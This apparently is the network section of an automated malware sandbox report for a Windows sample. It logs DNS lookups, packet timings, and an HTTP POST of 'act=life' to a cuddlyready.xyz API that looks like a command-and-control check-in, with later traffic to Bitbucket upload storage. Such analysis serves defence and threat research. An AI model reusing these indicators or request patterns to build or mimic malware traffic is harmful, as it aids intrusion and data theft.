                                                                                                                                                                                        Dec 23, 2024 09:23:55.892638922 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.892674923 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.893110991 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.893156052 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:55.893304110 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:55.893397093 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.044986963 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.045015097 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.045063019 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.045073986 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.045079947 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.045114040 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.051088095 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.051112890 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.051148891 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.051153898 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.051194906 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057221889 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057245016 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057322025 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057328939 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063232899 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063271999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063292980 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063298941 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063327074 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069622993 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069703102 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069709063 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069770098 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069773912 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.072740078 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075833082 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075855017 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075903893 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075942039 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075942039 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075947046 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075957060 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.077903032 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081789970 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081809998 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081856966 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081862926 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081892014 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104934931 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104939938 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104990005 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235909939 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235944986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235991001 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236006975 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236040115 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236051083 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.239947081 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.239975929 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240005970 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240025043 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240041018 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246112108 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246148109 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246177912 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246206999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246217966 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252201080 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252254009 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252268076 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252281904 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252310038 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258322001 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258392096 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258394003 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258408070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258451939 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.259004116 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.259066105 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.260104895 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264646053 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264689922 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264712095 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264719963 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264745951 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264801025 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264816999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.268902063 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270839930 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270891905 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270905972 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270914078 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270951986 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.276928902 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.276998043 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277018070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277089119 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277601957 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277662992 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.287003040 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429059029 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429095030 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429145098 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429173946 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429192066 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429219007 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429459095 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441303968 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441333055 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441360950 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441390038 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441399097 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443408012 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443456888 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443459988 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443474054 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443506002 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447705030 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447727919 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447797060 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447804928 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447813988 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447834015 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447849989 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.453193903 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454114914 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454138994 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454169035 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454178095 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454205990 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.454224110 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459521055 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459549904 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459600925 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459608078 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459650993 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.459683895 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.460225105 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.466335058 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.466348886 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.466403008 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.466412067 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.508486032 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618335962 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618402958 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618448973 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618484020 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618499041 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618539095 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.618546009 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624399900 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624455929 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624458075 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624486923 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624492884 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.624540091 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.631211996 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.631288052 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.631300926 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.631329060 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.631365061 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.636496067 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.636576891 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.636581898 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.636601925 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.636642933 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.637273073 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.637326956 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642648935 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642695904 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642740965 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642751932 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642781973 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.642941952 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.643369913 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.644236088 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.648983002 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.649029970 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.649075031 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.649085999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.649117947 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655030012 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655103922 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655112028 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655180931 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655188084 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.655246973 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661233902 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661283970 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661329985 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661345005 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661371946 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661386967 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.661917925 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.708389997 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.729049921 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.781754971 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814162970 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814188957 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814237118 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814254045 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814282894 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814306021 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.814801931 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.820842028 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.820858955 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.820899010 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.820905924 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.820938110 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.824333906 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.824379921 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.824410915 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.824412107 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.824502945 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.838206053 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.868938923 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:57.027868986 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:57.027908087 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:57.027928114 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:57.027936935 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 23, 2024 09:23:27.840410948 CET4966453192.168.2.71.1.1.1
                                                                                                                                                                                        Dec 23, 2024 09:23:28.150536060 CET53496641.1.1.1192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.989064932 CET5217953192.168.2.71.1.1.1
                                                                                                                                                                                        Dec 23, 2024 09:23:50.127772093 CET53521791.1.1.1192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.232785940 CET5050653192.168.2.71.1.1.1
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET53505061.1.1.1192.168.2.7
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 23, 2024 09:23:27.840410948 CET192.168.2.71.1.1.10xec18Standard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:49.989064932 CET192.168.2.71.1.1.10x3516Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.232785940 CET192.168.2.71.1.1.10xa907Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                        Dec 23, 2024 09:23:28.150536060 CET1.1.1.1192.168.2.70xec18No error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:28.150536060 CET1.1.1.1192.168.2.70xec18No error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:50.127772093 CET1.1.1.1192.168.2.70x3516No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:50.127772093 CET1.1.1.1192.168.2.70x3516No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:50.127772093 CET1.1.1.1192.168.2.70x3516No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com3.5.25.82A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com3.5.28.244A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com52.216.110.195A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com52.216.211.241A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com3.5.9.216A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com16.15.185.29A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com52.217.113.89A (IP address)IN (0x0001)false
                                                                                                                                                                                        Dec 23, 2024 09:23:52.588196039 CET1.1.1.1192.168.2.70xa907No error (0)s3-w.us-east-1.amazonaws.com16.182.101.89A (IP address)IN (0x0001)false
                                                                                                                                                                                        • cuddlyready.xyz
                                                                                                                                                                                        • bitbucket.org
                                                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.749699172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-23 08:23:29 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                                                        2024-12-23 08:23:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                        2024-12-23 08:23:30 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 23 Dec 2024 08:23:30 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=2g0e78k3mqng9sppirh8mritc2; expires=Fri, 18 Apr 2025 02:10:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=udTXNOK3bZ3ZmNzJQQ1Esmh86ugb6Yn4RPa7sLYHpqRwbPLQg2NeSdPI%2Fj4EqkV0SA3HObKlwYZldB8ejVdG4oiegf9EaCHZXjhc0OvdgwyTrnY93UOcRcyCBbzcMcRM9N0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f32aaa084238-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1596&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1732937&cwnd=244&unsent_bytes=0&cid=85d11d31fa86ce6e&ts=817&x=0"
                                                                                                                                                                                        2024-12-23 08:23:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                        2024-12-23 08:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.749700172.67.150.1734437312C:\Users\user\Desktop\FBmz85HS0d.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
